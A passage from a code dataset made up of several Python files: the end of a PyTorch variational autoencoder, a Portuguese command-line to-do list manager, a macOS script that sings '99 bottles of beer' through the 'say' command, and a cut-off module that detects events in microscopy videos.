self.e_flatten(x)\n\n mu = self.mu_fc(x)\n logvar = self.logvar_fc(x)\n\n return mu, logvar\n\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(.5 * logvar)\n eps = torch.randn_like(std)\n\n return mu + eps * std\n\n\n def decode(self, z):\n z = self.d_lin(z)\n z = self.d_reshape(z)\n z = self.d_relu1(z)\n z = self.convt1(z)\n z = self.d_relu2(z)\n z = self.d_bn1(z)\n z = self.convt2(z)\n z = self.d_relu3(z)\n z = self.d_bn2(z)\n z = z[:, :, 4:-4, 4:-4].contiguous()\n\n return z\n\n\n def forward(self, x):\n mu, logvar = self.encode(x)\n z = self.reparametrize(mu, logvar)\n out = self.decode(z)\n\n return out, mu, logvar\n","sub_path":"models/model2.py","file_name":"model2.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"617128737","text":"#arquivo = open(\"todo.txt\",\"w+\")\r\n#arquivo.write(\"25062019 1850 (A) \"+\"Final de Estatística \"+ \"\\n\"\"21062019 2359 (A) \"+\"Entrega do projeto de @P1 + IF968\" +\"\\n\"\"01072019 1700 (A) \"+\"Prova de Programação \" +\"\\n\"\"(B) \"+\"Terminar artigo @IF762 + Pesquisa\" +\"\\n\"\"(D) \"+\"Terminar The Big Bang Theory @Casa\"+\"\\n\"\"(B) \"+ \"Concluir os cursos @Udemy + Pesquisa\"+ \"\\n\"\"(C) \"+\"Acordar Cedo\" +\"\\n\"\"(A) \"+\"Fazer exércícios @Emagrecer\" +\"\\n\"\"12072019 (F)\"+\" Viajar com Amanda,Aldo,Arthur @Taquaritinga\"+ \"\\n\"\"15072019 (E) \"+\"Comprar roupas @SantaCruzCapibaribe\" +\"\\n\"\"19072019 (E) \"+\"Voltar de Viajem @SantaCruzCapibaribe\" +\"\\n\"\"22072019 (F) \"+\"Passear com Sobrinhas Sophie,Fernanda,Julia,Vitoria @Shopping\" +\"\\n\"\"01082019 (A) \"+\"Ter três certificados @Udemy\" +\"\\n\"\"(Z) \"+\"Me atualizar nos animes @casa\" +\"\\n\"\"(B) \"+\"Arrumar Notebook @Assistencia\" +\"\\n\"\"05082019 (C) \"+\"Pegar Óculos Novos @Recife\" +\"\\n\"\"10082019 (A)\"+\" Sair pra jantar com Amanda @Sushi\" +\"\\n\"\"20082019 (A) \"+\"Ter perdido 10kg @Emagrecer\" +\"\\n\")\r\n#arquivo.close()\r\n\r\nimport sys\r\n\r\nTODO_FILE = 'todo.txt'\r\nARCHIVE_FILE = 'done.txt'\r\n\r\nRED = \"\\033[1;31m\"\r\nBLUE = \"\\033[1;34m\"\r\nCYAN = \"\\033[1;36m\"\r\nGREEN = \"\\033[0;32m\"\r\nRESET = \"\\033[0;0m\"\r\nBOLD = \"\\033[;1m\"\r\nREVERSE = \"\\033[;7m\"\r\nYELLOW = \"\\033[0;33m\"\r\n\r\nADICIONAR = 'a'\r\nREMOVER = 'r'\r\nFAZER = 'f'\r\nPRIORIZAR = 'p'\r\nLISTAR = 'l'\r\n\r\n# Imprime texto 
com cores. Por exemplo, para imprimir \"Oi mundo!\" em vermelho, basta usar\r\n#\r\n# printCores('Oi mundo!', RED)\r\n# printCores('Texto amarelo e negrito', YELLOW + BOLD)\r\n\r\ndef printCores(texto, cor) :\r\n print(cor + texto + RESET)\r\n\r\n\r\ndef processarComandos(comandos) :\r\n if (comandos[1] == \"a\"):\r\n comandos.pop(0) # remove 'agenda.py'\r\n comandos.pop(0) # remove 'adicionar'\r\n itemParaAdicionar = organizar([' '.join(comandos)])[0]\r\n # itemParaAdicionar = (descricao, (prioridade, data, hora, contexto, projeto))\r\n adicionar(itemParaAdicionar[0], itemParaAdicionar[1]) # novos itens não têm prioridade\r\n elif (comandos[1] == \"l\"):\r\n listar()\r\n elif (comandos[1] == \"r\"):\r\n remover(comandos[2])\r\n elif comandos[1] == \"f\":\r\n fazer(comandos[2])\r\n elif comandos[1] == \"p\":\r\n priorizar(comandos[2],comandos[3])\r\n else :\r\n print(\"Comando inválido.\")\r\n\r\ndef organizar(linhas):\r\n itens = []\r\n for x in range(0, len(linhas)):\r\n listaString = linhas[x].split()\r\n data = \"\"\r\n hora = \"\"\r\n pri = \"\"\r\n desc = \"\"\r\n contexto = \"\"\r\n projeto = \"\"\r\n if (dataValida(listaString[0])):\r\n data = listaString.pop(0)\r\n if (horaValida(listaString[0])):\r\n hora = listaString.pop(0)\r\n if (prioridadeValida(listaString[0])):\r\n pri = listaString.pop(0)\r\n while (projetoValido(listaString[-1])):\r\n projeto += listaString.pop(-1) + \" \"\r\n while (contextoValido(listaString[-1])):\r\n contexto += listaString.pop(-1) + \" \"\r\n for y in range(0, len(listaString)):\r\n desc += listaString[y] + \" \"\r\n itens.append((desc, (data, hora, pri, contexto, projeto)))\r\n\r\n # acima, função percorre todas as linhas do arquivo, e a cada linha ele testa a string para ver as informações \"extras\" são válidas e as adiciona nas variavéis locais\r\n # e na decrição uso as strings restantes para formar a informação novamente e adiciono tudo na lista \"itens\"\r\n return itens\r\n\r\n\r\n\r\ndef criarListaLinhas():\r\n listaLinhas = [line.rstrip(\"\\n\") for line in open(\"todo.txt\")]\r\n return listaLinhas\r\n\r\n# (DESC, (DATA, HORA, PRI, CONTEXTO, PROJETO)).\r\n\r\n\r\ndef horaValida(string):\r\n if(len(string)!=4 or not(str.isdigit(string)) or not(int(string[:2])>=0 and int(string[:2])<=23) or not(int(string[2:])>=0 and int(string[2:])<=59)):\r\n return False\r\n else:\r\n return True\r\n # primeiro vejo se a string tem 4 digitos, (str.isdigit) diz se a string é um dígito ou não, se não tiver 4 digitos e se não forem válidos retorna False\r\n # e também converte para inteiro e vê se o numero está entre 0 e 23 e para os minutos se está entre 0 e 59, se não satisfazer essa condição retorna False, de outra forma retorna True\r\n\r\ndef dataValida(string):\r\n if(len(string)!=8 or not(str.isdigit(string)) or not(int(string[4:])>=2018 and int(string[4:])<=2024)):\r\n return False\r\n # primeiro vejo se a string tem 8 digitos, (str.isdigit) diz se a string é um dígito ou não, se não tiver 8 digitos e não tiver entre o ano de 2018 até 2024 retorna False\r\n else:\r\n if (int(string[2:4])<=7):\r\n if (int(string[2:4])%2==1):\r\n if ((int(string[:2])>=1) and (int(string[:2])<=31)):\r\n return True\r\n else:\r\n return False\r\n elif (int(string[2:4])==2):\r\n if ((int(string[:2]) >= 1) and (int(string[:2]) <= 29)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n if ((int(string[:2]) >= 1) and (int(string[:2]) <= 30)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n if (int(string[2:4])%2==0):\r\n if ((int(string[:2])>=1) and 
(int(string[:2])<=31)):\r\n return True\r\n else:\r\n return False\r\n else:\r\n if ((int(string[:2]) >= 1) and (int(string[:2]) <= 30)):\r\n return True\r\n else:\r\n return False\r\n # No else eu trabalho os meses do ano, todos os meses impares até >=7 tem 31 dias, e os meses pares >=8 e <=12 também tem 31 dias.\r\n # de resto tirando o mês 2 todos os outros meses restantes tem 30 dias.\r\n\r\ndef projetoValido(string):\r\n if (len(string)>=2 and (string[0])==\"+\"):\r\n return True\r\n else:\r\n return False\r\n#Acima ele vê se a string tem a string '+', se sim valida, se não retorna False\r\n\r\ndef contextoValido(string):\r\n if (len(string)>=2 and (string[0])==\"@\"):\r\n return True\r\n else:\r\n return False\r\n #Na função contexto ele lê as strings se achar o '@' ele valida, se não retorna False\r\n\r\ndef prioridadeValida(string):\r\n if(string[0]==\"(\" and string[2] ==\")\"):\r\n if(ord(string[1])>=ord(\"A\") and ord(string[1])<= ord(\"Z\")):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\ndef adicionar(descricao,extras):\r\n if(descricao==''):\r\n print(\"Não foi possível escrever para o arquivo \" + \"todo.txt\")\r\n return False\r\n else:\r\n desc = descricao\r\n data = \"\"\r\n hora = \"\"\r\n prioridade = \"\"\r\n contexto = \"\"\r\n projeto = \"\"\r\n finalform=\"\"\r\n for x in range(0,len(extras)):\r\n if(not(extras[x]==\"\")):\r\n if(dataValida(extras[x])):\r\n data=extras[x]\r\n if(horaValida(extras[x])):\r\n hora=extras[x]\r\n if(prioridadeValida(extras[x])):\r\n prioridade=extras[x]\r\n if(contextoValido(extras[x])):\r\n contexto = extras[x]\r\n if (projetoValido(extras[x])):\r\n projeto = extras[x]\r\n if(data!=\"\"):\r\n finalform+=data+\" \"\r\n if(hora!=\"\"):\r\n finalform+=hora+\" \"\r\n if(prioridade!=\"\"):\r\n finalform+=prioridade+\" \"\r\n finalform+=desc+\" \"\r\n if(contexto!=\"\"):\r\n finalform+=contexto+\" \"\r\n if(projeto!=\"\"):\r\n finalform+=projeto\r\n with open(\"todo.txt\", \"r+\") as f:\r\n d = f.readlines()\r\n f.seek(0)\r\n for x in range (0,len(d)):\r\n f.write(d[x])\r\n f.write(finalform+\"\\n\")\r\n f.truncate()\r\n f.close()\r\n #Acima, eu crio as variáveis com string vazia, percorro o arquivo chamando cada função pra ver se as informações extras são válidas ou não,\r\n #e caso sejam eu as adiciono ao arquivo,e adiciono a descrição tbm, e exibo um erro caso a descrição, seja uma string vazia.\r\n\r\ndef listar():\r\n arquivo =open(\"todo.txt\",\"r\")\r\n linhas = criarListaLinhas()\r\n#Crio uma lista de linhas do 'arquivo' completo.\r\n arquivo.close()\r\n organizada = organizar(linhas)\r\n#evoco a função organizar na lista de linhas, devolvendo uma tupla no modelo pedido no projeto (desc, (data, hora, pri, contexto, projeto))\r\n ordenadaPorPrioridade=ordenarPorPrioridade(organizada)\r\n#evoco a função ordenar por prioridade e retorno a tupla com a prioridade na frente, se houver a prioridade descrita.\r\n totalmenteOrdenada=ordenarPorDataHora(ordenadaPorPrioridade)\r\n#evoco a função ordenar por hora e retorno a tupla com a hora na frente, se houver hora descrita.\r\n arquivo = open(\"todo.txt\", \"r\")\r\n linhas = criarListaLinhas()\r\n arquivo.close()\r\n real = organizar(linhas)\r\n for x in range(0,len(totalmenteOrdenada)):\r\n formafinal=\"\"\r\n for y in range(0,len(real)):\r\n if(totalmenteOrdenada[x][0]==real[y][0]):\r\n formafinal+=str(y)+\" \"\r\n break\r\n ###para cada elemento da lista ordenada acha a posição na agenda e adiciona na primeira posição da formafinal\r\n 
#######################\r\n if(totalmenteOrdenada[x][1][0]!=\"\"):\r\n formafinal+=totalmenteOrdenada[x][1][0]+\" \"\r\n #CHECA SE EXISTE UMA DATA E SE HOUVER ADICIONA PRIMEIRA POSIÇÃO.\r\n if(totalmenteOrdenada[x][1][1] != \"\"):\r\n formafinal += totalmenteOrdenada[x][1][1] + \" \"\r\n #CHECA SE EXISTE UMA HORA E SE HOUVER ADICIONA PRIMEIRA POSIÇÃO.\r\n if(totalmenteOrdenada[x][1][2]!= \"\"):\r\n formafinal+=totalmenteOrdenada[x][1][2] + \" \"\r\n #CHECA SE EXITE UMA PRIORIDADE SE HOUVER, ADICIONA NA PRIMEIRA POSIÇÃO\r\n formafinal+=totalmenteOrdenada[x][0]+\" \" #E FINALMENTE AO FINAL EU ADICIONO A INFORMAÇÃO EXISTENTE NA LISTAGEM NA PRIMEIRA POSIÇÃO\r\n if (totalmenteOrdenada[x][1][3] != \"\"):\r\n formafinal += totalmenteOrdenada[x][1][3] + \" \"\r\n #CHECA SE EXISTE O CONTEXTO E SE HOUVER ADICIONA NA POSIÇÃO POSTERIOR\r\n if (totalmenteOrdenada[x][1][4] != \"\"):\r\n formafinal += totalmenteOrdenada[x][1][4]\r\n #CHECA SE EXISTE UMA UM PROJETO E ADICIONA ELE NA POSIÇÃO POSTERIOR\r\n if(totalmenteOrdenada[x][1][2]==\"A\"):\r\n printCores(formafinal, RED + BOLD)\r\n # Defino as atividades com prioridade \"A\" em Vermelho\r\n elif(totalmenteOrdenada[x][1][2]==\"B\"):\r\n printCores(formafinal, YELLOW)\r\n # Defino as atividades com prioridade \"B\" em Amarelo\r\n elif (totalmenteOrdenada[x][1][2] == \"C\"):\r\n printCores(formafinal, GREEN)\r\n # Defino as atividades com prioridade \"C\" em Verde\r\n elif (totalmenteOrdenada[x][1][2] == \"D\"):\r\n printCores(formafinal, BLUE)\r\n # Defino as atividades com prioridade \"D\" em Azul\r\n else:\r\n print(formafinal)\r\n\r\ndef ordenarPorDataHora(listaDeTuplas):\r\n for l in range(0,len(listaDeTuplas)):\r\n atual = 0\r\n while atual < len(listaDeTuplas)-1:\r\n if(listaDeTuplas[atual][1][2]==listaDeTuplas[atual+1][1][2]):\r\n if(listaDeTuplas[atual][1][0]==\"\" and listaDeTuplas[atual+1][1][0]!=\"\"):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif(listaDeTuplas[atual][1][0]==\"\"):\r\n nadaAconteceFeijoada=0\r\n elif(listaDeTuplas[atual+1][1][0]==\"\"):\r\n nadaAconteceFeijoada = 0\r\n elif(int(listaDeTuplas[atual][1][0][4:])>int(listaDeTuplas[atual+1][1][0][4:])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif(int(listaDeTuplas[atual][1][0][4:])==int(listaDeTuplas[atual+1][1][0][4:])):\r\n if(int(listaDeTuplas[atual][1][0][2:4])>int(listaDeTuplas[atual+1][1][0][2:4])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif(int(listaDeTuplas[atual][1][0][2:4])==int(listaDeTuplas[atual+1][1][0][2:4])):\r\n if(int(listaDeTuplas[atual][1][0][:2])>int(listaDeTuplas[atual+1][1][0][:2])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n if (listaDeTuplas[atual][1][2] == listaDeTuplas[atual + 1][1][2] and listaDeTuplas[atual][1][0]== listaDeTuplas[atual +1][1][0]):\r\n if (listaDeTuplas[atual][1][1] == \"\" and listaDeTuplas[atual + 1][1][1] != \"\"):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif (listaDeTuplas[atual][1][1] == \"\"):\r\n nadaAconteceFeijoada = 0\r\n elif (listaDeTuplas[atual + 1][1][1] == \"\"):\r\n nadaAconteceFeijoada = 0\r\n elif (int(listaDeTuplas[atual][1][1][:2]) > int(listaDeTuplas[atual + 1][1][1][:2])):\r\n temp = 
listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif (int(listaDeTuplas[atual][1][1][:2]) == int(listaDeTuplas[atual + 1][1][1][:2])):\r\n if(int(listaDeTuplas[atual][1][1][2:]) > int(listaDeTuplas[atual + 1][1][1][2:])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n atual=atual+1\r\n return listaDeTuplas\r\n\r\n\r\n\r\ndef ordenarPorPrioridade(listaDeTuplas):\r\n\r\n for l in range(0,len(listaDeTuplas)):\r\n atual = 0\r\n while atual < len(listaDeTuplas)-1:\r\n if(listaDeTuplas[atual][1][2]==\"\" and listaDeTuplas[atual+1][1][2]!=\"\"):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n elif (listaDeTuplas[atual][1][2] == \"\"):\r\n nadaAconteceFeijoada = 0\r\n elif(listaDeTuplas[atual+1][1][2]==\"\"):\r\n nadaAconteceFeijoada=0\r\n elif(ord(listaDeTuplas[atual][1][2][1]) > ord(listaDeTuplas[atual + 1][1][2][1])):\r\n temp = listaDeTuplas[atual]\r\n listaDeTuplas[atual] = listaDeTuplas[atual + 1]\r\n listaDeTuplas[atual + 1] = temp\r\n atual = atual+1\r\n return listaDeTuplas\r\n\r\ndef remover(numero):\r\n num_linhas = sum(1 for line in open('todo.txt'))\r\n if(numero>num_linhas):\r\n print(\"erro\")\r\n else:\r\n with open(\"todo.txt\", \"r+\") as f:\r\n d = f.readlines()\r\n f.seek(0)\r\n for x in range (0,len(d)):\r\n if(x!=numero):\r\n f.write(d[x])\r\n f.truncate()\r\n\r\ndef priorizar(numero,caractere):\r\n arquivo = open(\"todo.txt\", \"r+\")\r\n linhas = criarListaLinhas()\r\n arquivo.close()\r\n real = organizar(linhas)\r\n num_linhas = sum(1 for line in open('todo.txt'))\r\n if (numero > num_linhas):\r\n print(\"erro\")\r\n else:\r\n with open(\"todo.txt\", \"r+\") as f:\r\n f.seek(0)\r\n for x in range (0,len(real)):\r\n if(x!=numero):\r\n f.write((str(real[x][1][0] + \" \") if (real[x][1][0] != \"\") else \"\") + (\r\n str(real[x][1][1] + \" \") if (real[x][1][1] != \"\") else \"\") + (\r\n str(real[x][1][2] + \" \") if (real[x][1][2] != \"\") else \"\") + str(real[x][0]) + \" \" + (\r\n str(real[x][1][3] + \" \") if (real[x][1][3] != \"\") else \"\") + (\r\n str(real[x][1][4] + \"\") if (real[x][1][4] != \"\") else \"\") + \"\\n\")\r\n\r\n # esse conjunto de ternário, não entrelaçados, checa se cada elemento opcional existe e o adiciona a linha a ser escrita, se não existir ignora a informação extra.\r\n else:\r\n f.write((str(real[x][1][0] + \" \") if (real[x][1][0] != \"\") else \"\") + (\r\n str(real[x][1][1] + \" \") if (real[x][1][1] != \"\") else \"\") + \"(\" + caractere + \") \" + str(\r\n real[x][0]) + \" \" + (str(real[x][1][3] + \" \") if (real[x][1][3] != \"\") else \"\") + (\r\n str(real[x][1][4] + \"\") if (real[x][1][4] != \"\") else \"\") + \"\\n\")\r\n # Nesse else quando for a linha desugnada no primeiro parâmetro da função é feito a quase a mesma checagem, exceto pela prioridade que é modificada de acordo com a\r\n # entrada do segundo parâmetro da função ou adicionada a prioridade caso a mesma não exista.\r\n f.truncate()\r\n\r\n\r\ndef fazer(numero):\r\n num_linhas = sum(1 for line in open('todo.txt'))\r\n if (numero > num_linhas):\r\n print(\"erro\")\r\n else:\r\n arquivo = open(\"todo.txt\", \"r+\")\r\n linhas = criarListaLinhas()\r\n arquivo.close()\r\n file = open(\"done.txt\",\"r+\")\r\n file.write(linhas[numero] + \"\\n\")\r\n file.close()\r\n 
remover(numero)\r\n\r\nlistar()","sub_path":"Agenda.py","file_name":"Agenda.py","file_ext":"py","file_size_in_byte":17681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497043033","text":"'''\nAn improved version of beersong.py.\nThis version does not display the lyics, but will sing the song.\n\nIn beersong1 use of os.system('say ...') causes the program to be uninterruptable.\nThis issue was resolved by replaced os.system('say ...') with a method from the subprocess module.\n\nThis is the karaoke edition, if prints the lyrics so you can sing along.\nBecause of the speak function, this script is macOS only.\n'''\n\nfrom sys import platform\t#Determine os.\nimport os\t\t\t\t\t#Used to find the length of terminal window.\nimport subprocess\t\t\t#Allows computer to talks out loud.\n\n#Determine os and define speak appropriately.\n#Speak also prints words to terminal window.\nif platform == 'darwin':\n\tlength = int(os.popen('stty size', 'r').read().split()[1]) #Length of terminal window.\n\tclear = \" \" * (length - 1)\t#Used to clear line text.\n\trate = 275 #Rate of speech\n\tdef speak(words):\n\t\tprint(\"\\r\" + clear, end=\"\")\n\t\tprint(\"\\r\\t{}\".format(words), end=' ')\n\t\tprint(u\"\\U0001F37B\") #Print Unicode Beer mug.\n\t\tsubprocess.run(['say', '-r {}'.format(rate), '{}'.format(words)]) #Allow user to interrupt the song.\nelse:\n\tprint(\"Sorry, this script will only run on macOS.\")\n\texit()\n\n#Suppress tracebacks.\ntry:\n\tprint()\n\tprint(\"\\tStop the code with Ctrl + C\\n\")\n\t#Start Singing\n\t##Choose bottle or bottles\n\tbottle_or_bottles = \" bottles\" #Extra space for formatting\n\tfor beer_num in range(99, 0, -1):\n\t\tbeer_num_string = str(beer_num) #Convert to string.\n\t\tspeak(beer_num_string + bottle_or_bottles + \" of beer on the wall\")\n\t\tspeak(beer_num_string + bottle_or_bottles + \" of beer\")\n\t\tspeak(\"Take one down\")\n\t\tspeak(\"Pass it around.\")\n\t\tif beer_num == 1: #Remember, we converted beer_num to a string.\n\t\t\tspeak(\"No more bottles of beer on the wall.\")\n\t\t\tprint()\n\t\telse:\n\t\t\tnew_num = beer_num - 1\n\t\t\tnew_num_string = str(new_num)\n\t\t\tif new_num == 1:\n\t\t\t\tbottle_or_bottles = \" bottle\" #Extra space for formatting.\n\t\t\tspeak(new_num_string + bottle_or_bottles + \" of beer on the wall.\")\n\t\t\tprint()\n\nexcept KeyboardInterrupt:\n\tend_message=\"Okay, I'll stop....\"\n\tspeak(end_message)\n","sub_path":"Head_First_Python/ Ch1_TheBasics/beersong2.py","file_name":"beersong2.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19193551","text":"# Author: Meryll Dindin\n# Date: 10/26/2019\n# Project: ExoSpytosis\n\ntry: from package.utils import *\nexcept: from utils import *\n\n# Multiprocessing related wrappers\n\ndef mp_noiselevel(index, filename, percentile):\n \n with ND2Reader(filename) as fle: img = np.asarray(fle[index])\n return np.percentile(Frame(img).getBackground(), percentile)\n\ndef mp_get_frames(index, filename):\n \n with ND2Reader(filename) as fle: return Frame(np.asarray(fle[index])).img\n \ndef mp_extraction(index, filename, noise, background):\n \n with ND2Reader(filename) as fle: frm = Frame(np.asarray(fle[index]))\n x,y = np.where(frm.applyFilters(noise, background))\n return np.vstack((x, y, np.full(len(x), index))).T\n\n# General classes\n\nclass Frame:\n \n def __init__(self, image):\n \n self.img = np.clip(image, 0, 255) / 
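The two hand-rolled bubble-sort passes in the Agenda.py record above (`ordenarPorPrioridade`, `ordenarPorDataHora`) can be collapsed into one stable `sorted` call with a composite key over the same `(desc, (data, hora, pri, contexto, projeto))` tuples, pushing empty fields last explicitly. A sketch:

```python
def sort_key(item):
    desc, (data, hora, pri, contexto, projeto) = item
    # Empty fields sort last; ddmmyyyy dates are rearranged to yyyymmdd so that
    # plain string comparison gives chronological order.
    date_key = data[4:] + data[2:4] + data[:2] if data else ""
    return (pri == "", pri, data == "", date_key, hora == "", hora)

# totalmente_ordenada = sorted(organizar(criarListaLinhas()), key=sort_key)
```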
255.0\n self.dim = image.shape\n \n def getMasks(self, threshold=0.1):\n \n sig = estimate_sigma(self.img, average_sigmas=False, multichannel=False)\n blr = snd.gaussian_filter(self.img, sigma=sig)\n thr = threshold_otsu(blr)\n bry = (blr >= thr)\n new = binary_opening(bry)\n \n new = snd.morphology.binary_fill_holes(new)\n mat = np.array([[0, 0, 1, 1, 1, 0, 0],\n [0, 1, 1, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [0, 1, 1, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 0, 0]])\n msk = binary_dilation(new, selem=mat)\n \n warnings.simplefilter('ignore')\n msk = rank.mean(msk.astype('float'), selem=disk(16))\n out = np.where(msk > threshold, 0, 1).astype('bool')\n ins = np.where(msk <= threshold, 0, 1).astype('bool')\n\n # Memory efficiency\n del sig, blr, thr, bry, msk\n \n return ins, out\n \n def getBackground(self, threshold=0.1):\n \n # Retrieve the decomposition\n _,m = self.getMasks()\n # Apply the mask\n return self.img[m]\n \n def maskOnNoise(self, noise_level):\n \n return np.where(self.img < noise_level, 0, 1)\n \n def maskOnBackground(self, background):\n \n return np.where(self.img < background, 0, 1)\n \n def applyFilters(self, noise, background, threshold=0.1, sizes=(2,3,1,3)):\n\n # Look for the masks\n m,_ = self.getMasks(threshold=threshold)\n m_0 = self.maskOnNoise(noise)\n m_1 = self.maskOnBackground(background)\n \n # Override image\n self.img = (self.img*m*m_0*m_1 * 255.0).astype(np.uint8)\n \n # Post-process the results\n self.img = binary_dilation(self.img, selem=disk(sizes[0]))\n self.img = binary_erosion(self.img, selem=disk(sizes[1]))\n self.img = gaussian(self.img, sigma=sizes[2])\n self.img = binary_erosion(self.img, selem=disk(sizes[3]))\n \n return np.where(self.img > 1e-2, 1, 0).astype(np.uint8)\n\nclass Video:\n \n def __init__(self, filename, verbose=False, max_threads=cpu_count()):\n \n self.vrb = verbose\n self.pth = filename\n self.cpu = max_threads\n # Extract attributes\n with ND2Reader(self.pth) as fle:\n self.cnt = fle.metadata['num_frames']\n self.rte = fle.metadata['experiment']['loops'][0]['sampling_interval']\n \n # Run the initialization\n self._estimate_noiselevel()\n self._estimate_background()\n\n def _estimate_noiselevel(self, pad=50, percentile=99):\n \n t_0 = time.time()\n fun = partial(mp_noiselevel, filename=self.pth, percentile=percentile)\n\n if self.cpu == 1:\n res = np.asarray([fun(idx) for idx in np.arange(0, self.cnt, pad)])\n else:\n with Pool(processes=self.cpu) as pol:\n res = np.asarray(pol.map(fun, np.arange(0, self.cnt, pad)))\n pol.close()\n \n self.lvl = np.mean(res)\n\n if self.vrb: print('# Noise level extracted in {} seconds'.format(np.round(time.time()-t_0, 3)))\n \n # Memory efficiency\n del fun, res\n if self.cpu > 1: # delete pol only if more than one thread used\n del pol\n \n def _estimate_background(self, frames=(1000, 3000, 10), percentile=90):\n\n t_0 = time.time()\n fun = partial(mp_get_frames, filename=self.pth)\n\n if self.cpu == 1:\n res = [fun(idx) for idx in np.arange(*frames)]\n else:\n with Pool(processes=self.cpu) as pol:\n res = pol.map(fun, np.arange(*frames))\n pol.close()\n \n warnings.simplefilter('ignore')\n self.bkg = np.percentile(res, percentile, axis=0)\n m_x = self.bkg.max()\n self.bkg = rank.mean(self.bkg, selem=disk(10)) / 255.0\n self.bkg = self.bkg * (m_x / self.bkg.max())\n\n if self.vrb: print('# Static background estimated in {} seconds'.format(np.round(time.time()-t_0, 3)))\n \n # Memory efficiency\n del fun, res\n if self.cpu > 1: # delete pol only if 
more than one thread used\n            del pol\n    \n    def visualizeFiltering(self, index, threshold=0.1):\n        \n        with ND2Reader(self.pth) as fle: frm = Frame(np.asarray(fle[index]))\n        \n        # Retrieve the decomposition\n        _,m = frm.getMasks(threshold=threshold)\n        m_0 = frm.maskOnNoise(self.lvl)\n        m_1 = frm.maskOnBackground(self.bkg)\n        \n        arg = {'vmin': 0, 'vmax': 1}\n        \n        plt.figure(figsize=(18,4))\n        plt.subplot(1,5,1)\n        plt.title('Initial Image')\n        plt.imshow(frm.img, **arg)\n        plt.xticks([])\n        plt.yticks([])\n        plt.subplot(1,5,2)\n        plt.title('Estimate Contours')\n        plt.imshow(m, **arg)\n        plt.xticks([])\n        plt.yticks([])\n        plt.subplot(1,5,3)\n        plt.title('Noise Thresholding')\n        plt.imshow(m_0, **arg)\n        plt.xticks([])\n        plt.yticks([])\n        plt.subplot(1,5,4)\n        plt.title('Background Thresholding')\n        plt.imshow(m_1, **arg)\n        plt.xticks([])\n        plt.yticks([])\n        plt.subplot(1,5,5)\n        plt.title('Post-processed Masks')\n        plt.imshow(frm.applyFilters(self.lvl, self.bkg), **arg)\n        plt.xticks([])\n        plt.yticks([])\n        plt.tight_layout()\n        plt.show()\n    \n    def process(self, max_distance=3):\n        \n        t_0 = time.time()\n        fun = partial(mp_extraction, filename=self.pth, noise=self.lvl, background=self.bkg)\n        \n        if self.cpu == 1:\n            res = [fun(idx) for idx in np.arange(self.cnt)]\n        else:\n            with Pool(processes=self.cpu) as pol:\n                res = pol.map(fun, np.arange(self.cnt))\n                pol.close()\n        pts = np.vstack(res)\n\n        if self.vrb: print('# Points of interest extracted in {} seconds'.format(np.round(time.time()-t_0, 3)))\n        t_0 = time.time()\n        \n        # Run density-based clustering\n        cls = DBSCAN(eps=max_distance, n_jobs=self.cpu).fit_predict(pts)\n\n        if self.vrb: print('# Event clustering in {} seconds'.format(np.round(time.time()-t_0, 3)))\n        \n        # First event estimation\n        list_events = [] \n        for crd in np.unique(cls):\n            list_points = [Point(*c) for c in pts[np.where(cls == crd)[0],:]]\n            list_events.append(Event(list_points, crd))\n        \n        # Memory efficiency\n        del fun, res, pts, cls\n        if self.cpu > 1: # delete pol only if more than one thread used\n            del pol\n        \n        return list_events\n\nclass Point:\n    \n    def __init__(self, x, y, z):\n        \n        self.x = x\n        self.y = y\n        self.z = z\n    \n    def distance(self, point):\n        \n        return np.sqrt((point.x - self.x)**2 + (point.y - self.y)**2) + np.abs(point.z - self.z)\n    \nclass Event:\n    \n    def __init__(self, points, roi):\n        \n        self.roi = roi\n        self.pts = points\n    \n    def distance(self, event):\n        \n        dis = []\n        for point in self.pts:\n            # compare against the other event's points (not self.pts, which always yields 0)\n            dis.append(np.min([pts.distance(point) for pts in event.pts]))\n        return np.min(dis)\n    \n    def fusion(self, event):\n        \n        self.pts += event.pts\n    \n    def getPoints(self):\n        \n        try: return np.vstack([[p.x, p.y, p.z, self.roi] for p in self.pts])\n        except: return None\n    \n    def duration(self):\n        \n        dur = [point.z for point in self.pts]\n        return np.max(dur) + 1 - np.min(dur) \n    \n    def getAreaVolume(self):\n        \n        slc = np.vstack([[p.x, p.y, p.z] for p in self.pts])\n        \n        if len(np.unique(slc[:,2])) == 1: \n            ull = ConvexHull(points=slc[:,:2])\n        else: \n            ull = ConvexHull(points=slc[:,:])\n        \n        return (ull.area, ull.volume)\n    \n    def focus(self):\n        \n        disk_points = []\n        mat = self.getPoints()\n        \n        x = int(np.round(np.median(mat[:,0])))\n        y = int(np.round(np.median(mat[:,1])))\n        self.cen = (x, 